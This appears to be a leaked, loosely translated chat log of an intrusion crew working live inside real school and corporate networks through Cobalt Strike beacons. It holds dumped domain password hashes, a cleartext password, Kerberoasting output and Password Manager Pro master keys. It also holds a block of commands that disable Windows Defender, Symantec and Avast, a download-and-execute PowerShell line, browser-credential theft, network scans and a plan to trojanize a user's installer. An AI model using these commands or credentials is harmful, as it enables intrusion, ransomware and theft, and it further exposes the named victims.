10.0.51.46(Preferred) Subnet Mask . . . : 255.255.0.0 Default Gateway . . . . : 10.0.1.254 DHCPv6 IAID . . . . : 100668765 DHCPv6 Client DUID . . . . : 00-01-00-01-26-88-57-CF-00-15-5D-01-DF-19 DNS Servers . . . . : 10.0.51.74 10.0.51.75 NetBIOS over Tcpip. . . . .: Enabled `````` Network Card(s): 1 NIC(s) Installed. [01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: No IP address(es) [01]: 10.0.51.46 [02]: fe80::740f:5d54:8746:1b6d ``I also check that we have statics on all servers partially dhcp on armas? Network Card(s): 1 NIC(s) Installed.
[01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: No IP address(es) [01]: 10.0.51.3 [02]: fe80::3c15:2b64:760d:eb2b ``And dnscmd is only on dns servers? Do not shoot all in a row check a few armies and servers and tell me exactly where it is, let's do it without maybe on the servers maybe static? Windows IP Configuration Host Name . . . . . . : Geordi Primary Dns Suffix . . . : sisd.k12 Node Type . . . . .: Hybrid IP Routing Enabled . . . . : No WINS Proxy Enabled. .: No DNS Suffix Search List. : sisd.k12 Ethernet adapter Ethernet: Connection-specific DNS Suffix : Description . . . . . . .: Microsoft Hyper-V Network Adapter. Physical Address . . . . : 00-15-5D-01-80-12 DHCP Enabled . . . . .: No Autoconfiguration Enabled . .: Yes Link-local IPv6 Address . : fe80::3c15:2b64:760d:eb2b%4(Preferred) IPv4 Address . . . . .: 10.0.51.3(Preferred) Subnet Mask . . . : 255.255.0.0 Default Gateway . . . . : 10.0.1.254 DHCPv6 IAID . . . . . : 50337117 DHCPv6 Client DUID . . . . : 00-01-00-01-23-90-84-20-00-15-5D-01-80-12 DNS Servers . . . . : 10.0.51.74 10.0.51.75 NetBIOS over Tcpip . . . : Enabled Tunnel adapter Local Area Connection* 2: Media State . . . . . : Media disconnected Connection-specific DNS Suffix : Description . . . . . : Microsoft ISATAP Adapter Physical Address . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled . . . . .: No Autoconfiguration Enabled . .: Yes ````for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt ` at first ` dnscmd /enumzones > AllZones.txt ` how to remove dns I'll tell you a few arms just in case and from the second? yes that's from this domain as I understand ` Connection-specific DNS Suffix . : admin.sisd.k12 `` from Armagh. DNS Servers . . . . : 10.0.51.74 10.0.51.75 `` what's that from?
beacon> shell ipconfig /all [*] Tasked beacon to run: ipconfig /all [+] host called home, sent: 44 bytes [+] received output: Windows IP Configuration Host Name . . . . . : SRM-312-020. Primary Dns Suffix . . . . : admin.sisd.k12 Node Type . . . . : Hybrid IP Routing Enabled . . . . : No WINS Proxy Enabled. .: No DNS Suffix Search List. .: admin.sisd.k12 sisd.k12 sisd.k12 Ethernet adapter Ethernet: Connection-specific DNS Suffix . . : admin.sisd.k12 Description . . . . . : Realtek PCIe GBE Family Controller Physical Address . . . . : B8-85-84-AA-FB-02 DHCP Enabled. . . . . .: Yes Autoconfiguration Enabled. .: Yes IPv4 Address. : 10.57.243.225(Preferred) Subnet Mask . . . : 255.255.0.0 Lease Obtained . . . . : Wednesday, September 16, 2020 5:30:41 PM Lease Expires . . . . .: Tuesday, December 8, 2020 5:31:27 PM Default Gateway . . . . : 10.57.1.254 DHCP Server . . . . : 10.0.51.4 DNS Servers . . . . : 10.0.51.74 10.0.51.75 NetBIOS over Tcpip . . . : Enabled ``+ remove dns in general find infuna unlikely staticsu armaments dhcp or statics? so here they are also pinged probably) citricos armaments? I mean, they change from time to time citricos dhcpdns not see statics or dhcp in armaments?
already all pinged``` take off the dhcp see the armies on dhcp or static and ping them ``There's a problem for 1 man-session in two domains in the slip so far, throw in a good jobWin Def ``` reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f reg add "HKLM_SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f reg add "HKLM/SSOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f reg add "HKLM/SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f ``Symantec ``` net stop srservice ``Avast ``` @Echo off taskkill /f /im ashMaiSv.exe taskkill /f /im ashServ.exe taskkill /f /im aswUpdSv.exe taskkill /f /im ashDisp.exe Exit /b ``[ ](https://mediaeveryone.com/group/sisd-net?msg=wfYTtjYHM5woBJWMs) I've only seen it on one viewIf there is no central system let someone look for ways to turn off all the avers manuallywhat's this thing that bothers me...> 200 servers and > 4000 users then it turns out 3 people from here without tasks yet? as usual all of them. then we wait. 
will only steal servers or users too? dept will not make it we have contact with dept, maybe order yourself?we have to wait for tl2build now there is no tl2build, let's finish with it then? ok, where as. there solyanka assembled and the rest are empty? mostly on the file and skula bitdefender stands, if i'm not mistaken plus/minus when the servos sorted from each processlists took a lot of it more than 50% of all servers?[ ](https://mediaeveryone.com/group/sisd-net?msg=SSZ24JGTuwpkRkWib) by process many have nothing but vindef at all how did you determine? differently the server segment is covered by what? maybe they don't have a centralized avera after all? We found avira, bitdefender, CORTEX XDR™ and I think something else...both from polzac and from the system from the context of the polzac process? sharpweb found nothing, as well as sibeltda don't forget to change the process if it kicks out don't go there1 session 1 sharpweb, not more? and here is the description Usage: .\SharpWeb.exe arg0 [arg1 arg2 ...] Arguments: all - Retrieve all Chrome, FireFox and IE/Edge credentials. full - The same as 'all'. chrome - Fetch saved Chrome logins. firefox - Fetch saved FireFox logins. edge - Fetch saved Internet Explorer/Microsoft Edge logins. ``see edge folder in the projecthttp://github.com/djhohnstein/SharWeb does he use edge? ff? which is probably quieter than chrome) and kicked out - just sessions fell off via lazagne from the toolchain and how did you try to get them back?kicked out how? I found where the DA sits, but he kicked me out quickly, while I was trying to steal the credentials from the browser look for web access it must still be on amazon, on the data2 and dc domain sisd.k12 no admin avera - I'm there by rdp went to ...ok just describe the situation normally and not bits and pieces sketch in the general conf conf conf this case of migration between domains and was Lanu yes, but I learned that after dksinka and this polzak was LA? 
so maybe there was not an admin with such creds this car in the domain `ADM `, I was lucky that the local admin with the same creds No, this is on another issue[ ] (https://mediaeveryonecom/group/sisd-net?msg=BxPbEPBQ7Q9m3tSoZ) this admin process was where you had the session? `sisd.k12\ExchAdmin f461d17330cadafe07025e2256eda52a` - under these creds you can look directories on DATA2 but session is not raised in the ADM domain admin process on which question yes?)ADMdathe domain? that domain? admin what? let me start at the beginning, I was given a session under the system, I logged into the admin process and already under it looked at directories[ ](https://mediaeveryone.com/group/sisd-net?msg=cNQpCcL7oMoYo9i6zC) how did you check the diaries? you had to have access to that domain to give you a listing diaries`Sam07bo`f461d17330cadafe07025e2256eda52a found on cmd5 @tl1 make clickpls then jumped diary checked directories of cars that domainanet, how did you get in?and the session went up after running vmikomdl scripted in dlkak did you do? 
[DC] 'sisd.k12' will be the domain [DC] 'Geordi.sisd.k12' will be the DC server [DC] Exporting domain 'sisd.k12 [DC] ms-DS-ReplicationEpoch is: 1 502 krbtgt 473e0e4f4e2c2f68efe96bfe23e3b186 514 1001 SUPPORT_388945a0 5e62b6beff8ee61447406436dd7c8fa1 66050 1121 IWAM_PICARD d047d4e970e1f608542175fd69bf63f0 66080 1606 CMP-TCH-51-68$ 40d7e6ce37245fa0fb82021e392e32d2 4096 1111 RIKER$ 4dbc3efa9d3b7447e446d2a0614649e6 4096 1120 IUSR_PICARD 463af0a30e5de0fae941442e7aaf0c 66080 1617 DATA$ 1cf75f296f3bc0878b17689fa14e519f 4096 5610 ADFS-DIRSYNC2$ c0f22374c0e3623fd2df53d44ff7f5f3 4096 1114 DCHPAdmin f461d17330cadafe07025e2256eda52a 512 1605 ExchAdmin f461d17330cadafe07025e2252256eda52a 66048 5608 backupexec 410091ed6c810d68980fa84c69a19886 66048 5606 VDI-DDC1$ ee0400eec033d8ab2ea9950a5ab7ed18 4096 503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514 1126 SISD-DHCP-01$ a92dfdae9dd565b420cd8f3b2dd94a05 4096 7606 AZUREADSSOACC$ 3fe49e41eba481a7dd54ae104781328d 69632 7605 DESKTOP-7EDHUBD$ 47554a274b9d9d99b57e6be985332fde 4096 7607 NTP$ c260b6cb1403ef9c878a7a1bfb3ca1ea 4096 5612 DATA2$ bf7ecf55672760909a29e3a8e1aa368 4096 500 Administrator 410091ed6c810d68980fa84c69a19886 66048 7104 ADFS-DIRSYNC$ ed73098ff2fddf912c76e93a79c3d6d5 4096 7105 GEORDI$ e8cc320ade6b5ce43ddc553dd50e00db 532480 1106 ADM$ 5a98229bc5afbb1d30651d119bd9d9f9 2080 8604 LOR$ 07d2c1dcbb443c103fecc651475c9cb2 532480 7604 PICARD$ 84a342f7e77ce8d1dc718316105011fa 532480 5108 DATA3$ 3fb5d4e111cf430273321d4d19378a49 4096 ``USSC1500slip in 400 sec and leavesessions from rundll processes move to the systemmemo for tomorrowLocal admins found, hashes collected, go to the domainuntil then draw a line last message and for tomorrow check domain availability againCheck domain availability againTomorrow) you bypassed yuac module which disassembled) I about local admin[ ](https://mediaeveryone.com/group/usscgroup?msg=F4MBctxLgBSNGajBK) have not paid attention? 
Username : stwitchell * Domain : USSCGROUP.LOCAL * Password : 3stwitchell3# ``Local admin list still + password from the current one`` beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82501 bytes [+] received password hashes: %GuestUssc!!:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Nimda99:1001:aad3b435b51404eeaad3b435b51404ee:aae35fd0e9edf9eee30d512cdcdbc773::: PCPitstopSVC:1002:aad3b435b51404eeaad3b435b51404ee:c242ba17550668998afeb36cbb1992f0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a37c6648cb801450e1316a6b58d94aa8::: ``ask your colleagues how they got around yuac, you also polozak local admin today to a maximum of 12 hours, if you do your volume, tomorrow you can safely parse records)did not sign what the docs?)but I do not think that you for so many days of study, all written in one doc and did not delimit it in any way@user1 will have time, be sure)[ ](https://mediaeveryone.com/group/usscgroup?msg=Kqt3htCFgYRoGeoh8) do not remember, most likely yes `User USSC1500\Nimda99 S-1-5-21-2785713682-3075257879-4011609139-1001` and 1001 on the end means that the admin ?we had so many modules, we ran them for days in the lab and made notes, or they have run out?) not enough information? collect more and what is it? how to be further? you have ad info? don'tttalk on gathered info or dilute less loadeda meanwhile, if the session began to take commands again, you can send thema)[ ](https://mediaeveryone.com/group/usscgroup?msg=TQe8r8DwKcwkHvxTr) as soon as the session died out (passed the slip, then returned to normal) and no output came, you can continue to write commands)``[] [!] CVE-2019-1064 : VULNERABLE [>] https://www.rythmstick.net/posts/cve-2019-1064/ [!] 
CVE-2019-1130 : VULNERABLE [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear [!] CVE-2019-1253 : VULNERABLE [>] https://github.com/padovah4ck/CVE-2019-1253 [!] CVE-2019-1315 : VULNERABLE [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html [!] CVE-2019-1385 : VULNERABLE [>] https://www.youtube.com/watch?v=K6gHnr-VkAg [!] CVE-2019-1388 : VULNERABLE [>] https://github.com/jas502n/CVE-2019-1388 [!] CVE-2019-1405 : VULNERABLE [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/ [>] https://github.com/apt69/COMahawk ``Why don't you raise the context?)``caption is not raised? dk? specifically adfindthere is no point in hiding, because the running software is legitimatejust `shell adfind.bat``why do you use powerpik to work with exe launching?tl2user2+user7 I will add and you can do spidran)will do tomorrow, just a list of users here to work with this session before tomorrow+I sent @сlose to all green and delete files if there were do not forget to close sessionsTesting this script pack https://github.com/S3cur3Th1sSh1t/Creds/tree/master/PowershellScriptsтогда change the script `The term 'CheckIfWindowsIsCore' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. C:Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj SetkRegSmbv3Compression -value 1 The term 'SetkRegSmbv3Compression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 
```
00:00.0064
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker.ps1 SetkRegSmbv3Compression -value 1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0044
```
It doesn't work taki SetkRegSmbv3Compression -value 1
SetkRegSmbv3Compression -value 0
that kind of thing.
```powershell
Do {
    Get-Menu
    $input = Read-Host "Please make a selection"
    switch ($input) {
        '1' { Write-Host 'You chose option #1'; CheckRegSmbv3Compression }
        '2' { Write-Host 'You chose option #2'; SetkRegSmbv3Compression -value 1 }
        '3' { Write-Host 'You chose option #3'; SetkRegSmbv3Compression -value 0 }
        'Q' { return }
    }
    pause
}
```
```
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker.ps1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0080
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796
The term 'CVE-2020-0796' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0045
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker
The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0057
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1'));
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker
The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0048
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj CVE-2020-0796-Smbv3-checker.ps1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0044
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj .\CVE-2020-0796-Smbv3-checker.ps1
The term '.\CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0058
C:\Windows\System32\WindowsPowerShell\v1.0 BBCTX6 @ MAPCIASP\bbbwalkerj ./CVE-2020-0796-Smbv3-checker.ps1
The term './CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0030
```
Isn't the session dead after importing?
`iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1'));`
How do I apply it? So CVE-2020-0796-Smbv3-checker.ps1 and so CVE-2020-0796-Smbv3-checker doesn't work.
Help another command while sessions
Lёh, here's up to 150ZT-0314jesh-6396
```
File exceeds allowed size of 100 MB. [error-file-too-large]
```
would it be better to download it here as an archive or as a file?
ad_users downloaded yes, endpoint((
*with a password, if there is an endpoint, then only disable it in the password
@tl1 and kasper can shut it up for a while?
i hope you'll be able to download it in a few minutes........ then i looked at the size..... first i told you to download it...... i'm smart...... i hope you'll be able to download it....... how much do you think it'll weigh?
```
[X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED
```
```
[X] No users found to Kerberoast!
```
Both of the hash types try to take the rube off.
```
beacon> shell net group "enterprise admins" /dom
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator            pmpdemo                  rmp
The command completed successfully.
```
```
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            adssp                    assetprober
desktopcentral           gjprabu-0985             kamal-0150
nocfw                    sysadmin                 sysaudit
vijay-3486               zohoits
The command completed successfully.
```
The file is gone again.
```
[*] Action: AS-REP roasting

[*] Target Domain          : csez.zohocorpin.com

[*] Searching path 'LDAP://est-adc2.csez.zohocorpin.com/DC=csez,DC=zohocorpin,DC=com' for AS-REP roastable users
[*] SamAccountName         : gunas-0326
[*] DistinguishedName      : CN=Gunaseelan Parthiban,OU=Windows Server Management,OU=ManageEngine,OU=Users,OU=All Users and Computers,DC=csez,DC=zohocorpin,DC=com
[*] Using domain controller: est-adc2.csez.zohocorpin.com (192.168.100.93)
[*] Building AS-REQ (w/o preauth) for: 'csez.zohocorpin.com\gunas-0326'
[X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED
[*] Roasted hashes written to : C:\Users\raja-9298\EULA_as.txt
```
Let's put it this way.
`execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt`
Not even a blank and no output file, actually
```
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Users\raja-9298\EULA_ha.txt

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users
[X] No users found for Kerberoast!
[*] Roasted hashes written to : C:\Users\raja-9298\EULA_ha.txt
```
Did you do it? in #general and
AdventNetLicense.xml 3
```
ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering .
5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
```
AdventNetLicense.xml 2
```
ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydPP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering .
5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
```
AdventNetLicense.xml 1
```
ACNTRL="NO" CompanyName="Mizuho Information Research Institute Inc" EmailID="satoru.mochida@mizuho-ir.co.jp" Key="nJbGSnDTGRbp9NS3dP3XG7cydJJ97SlddJfyGnx3lcQ7ancPJdc7yVJzKJ9VSaSJJ99ancPJdc7y1bJKPDGyTdlAaDQaSnndPX9NTTnPfp97KDndV911Py3Aa97dD7ndV917K9u9P9yyPQbDufSJuyzTfzlp" LicenseType="Registered" Name="ADJ20S6024EI1" .
10Ui0U1W0WkR8H2goMATWU60U0W0Wv4XdNj84XRvNvDbTEVTEWUenjdjenjmjYIHRjYjCj9avsNvY8LUHJ4YX4NjPkRXGNjYvoLLKNkR4NKjYGvRv4s8ivrvHk4RvsKvsNvY8LHJIjYIR8UjCK98maXG8CYjmIKRj4Xs4YX4NjPkRXm8RpiV61100000VdjvsNvY8lETE0U111U5001djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz5N8mGXvKR4pMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
```
Another file
pmp_key.key
```
#This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro.
#The default location of this file is conf and it is not secure to leave this file here, unless
#the server is sufficiently hardened to protect any illegal access of this file.
#It is highly recommended to move this file out of its default location and for instructions to securely store this file refer.
#Thu Jul 23 12:13:08 IST 2020
ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc\=
```
`ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc=`
```
[*] Tasked beacon to run .NET program: SharpRoast.exe all
[+] host called home, sent: 120881 bytes
[+] received output:
SamAccountName         : certsrv
DistinguishedName      : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName   : http/its-winca.csez.zohocorpin.com
Hash                   : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
```
where is the info below?
no
This is full
full hash here please
`c.pwd`
```
encryption: CRYPT_32
isAutoGenerated: true
value: !binary
```
UserName=admin
OrgAgentKey=7ibHlt21yi
within this there is an av that is fighting against such methods
pon fact need to pull the file, glue it to the load and load it back
Sure, but it is not very simple and quite strange
@tl1 can we somehow take from his desktop file msi or exe add to it our load and force him to run? It's just that he has installers on his desktop and the same anydesk, which he probably runs without installing...
`pmp_key.key`
```
#This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro.
#The default location of this file is conf and it is not secure to leave this file here, unless
#the server is sufficiently hardened to protect any illegal access of this file.
#It is highly recommended to move this file out of its default location and for instructions to securely store this file refer.
#OLDENCRYPTIONKEY=9COBmS4sjljyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA=
#Tue Dec 10 20:22:53 IST 2019
ENCRYPTIONKEY=5qRvsVKpPFdB6RnZQI89p6PUYWT6Oki1gHGgZWgRID0=
```
`OLDENCRYPTIONKEY=9COBmS4sjljjyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA=`
`ENCRYPTIONKEY=5qRvsVKpFdB6RnZI89p6PUYWT6Oki1gHGgZWgRID0\=`
ShareFinder
```
\\trm-compliance.csez.zohocorpin.com\DC_Deployment    -
\\trm-compliance.csez.zohocorpin.com\F                -
\\trm-compliance.csez.zohocorpin.com\Venu-5860        -
\\DC-SOFTWARE.csez.zohocorpin.com\iso                 -
\\DC-SOFTWARE.csez.zohocorpin.com\print$              - Printer Drivers
\\DC-SOFTWARE.csez.zohocorpin.com\u16                 -
\\DC-SOFTWARE.csez.zohocorpin.com\Users               -
\\print-server-bkp.csez.zohocorpin.com\Coolpay-Server$ -
\\print-server-bkp.csez.zohocorpin.com\D              -
\\print-server-bkp.csez.zohocorpin.com\print$         - Printer Drivers
\\print-server-bkp.csez.zohocorpin.com\Users          -
\\est-desktopcentral.csez.zohocorpin.com\DC Backups   -
\\est-desktopcentral.csez.zohocorpin.com\DC_share     -
\\est-desktopcentral.csez.zohocorpin.com\logs         -
\\est-desktopcentral.csez.zohocorpin.com\pg_log       -
\\est-desktopcentral.csez.zohocorpin.com\ScheduledDBBackup -
\\est-desktopcentral.csez.zohocorpin.com\webapps      -
\\EST-ADC2.csez.zohocorpin.com\NETLOGON               - Logon server share
\\EST-ADC2.csez.zohocorpin.com\SYSVOL                 - Logon server share
```
Also looking for csez.zohocorpin.com ip DC `192.168.100.61`
```
SamAccountName         : certsrv
DistinguishedName      : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName   : http/its-winca.csez.zohocorpin.com
Hash                   : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com
```
`beacon> portscan 10.59.8.0/24 23,22,80,1433,135,445,3389,5900`
```
10.59.8.233:80
10.59.8.223:80
10.59.8.221:80
10.59.8.217:80
10.59.8.213:80
10.59.8.210:80
10.59.8.201:80
10.59.8.204:80
10.59.8.99:80
10.59.8.193:80
10.59.8.188:80
10.59.8.180:80
10.59.8.175:80
10.59.8.167:80
10.59.8.165:80
10.59.8.164:80
10.59.8.160:80
10.59.8.117:80
10.59.8.133:80
10.59.8.132:80
10.59.8.122:80
10.59.8.120:80
10.59.8.103:80
10.59.8.243:80
10.59.8.232:80
10.59.8.147:80
10.59.8.106:80
10.59.8.55:80
10.59.8.112:80
10.59.8.107:80
10.59.8.104:80
10.59.8.98:80
10.59.8.102:80
10.59.8.97:80
10.59.8.88:80
10.59.8.86:80
10.59.8.85:80
10.59.8.84:80
10.59.8.81:80
10.59.8.67:80
10.59.8.61:80
10.59.8.53:80
10.59.8.49:80
10.59.8.41:80
10.59.8.48:80
10.59.8.40:80
10.59.8.34:80
10.59.8.5:80
10.59.8.28:80
10.59.8.19:80
10.59.8.12:80
10.59.8.9:80
Scanner module is complete
```
10.59.9.180 ping more
`beacon> portscan 192.168.237.0/24 23,22,80,1433,135,445,3389,5900`
```
192.168.237.248:3389
192.168.237.248:1433
192.168.237.248:135
192.168.237.248:80
192.168.237.239:5900
192.168.237.231:80
192.168.237.231:23
192.168.237.216:3389
192.168.237.203:80
192.168.237.196:80
192.168.237.196:23
192.168.237.187:3389
192.168.237.187:135
192.168.237.187:80
192.168.237.248:22 (SSH-2.0-WeOnlyDo-wodFTPD 3.3.0.424)
192.168.237.231:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
192.168.237.216:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3)
192.168.237.203:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13)
192.168.237.196:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.6)
192.168.237.179:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
192.168.237.203:23
192.168.237.239:22 (SSH-2.0-OpenSSH_7.6)
192.168.237.187:22 (SSH-2.0-6.4.18.407 SSH Tectia Server)
192.168.237.179:445 (platform: 500 version: 6.1 name: ZLABS-VR-1 domain: WORKGROUP)
192.168.237.187:445
192.168.237.239:445
192.168.237.248:445
Scanner module is complete
```
```
[*] OS Build Number: 18363
[*] Enumerating installed KBs...
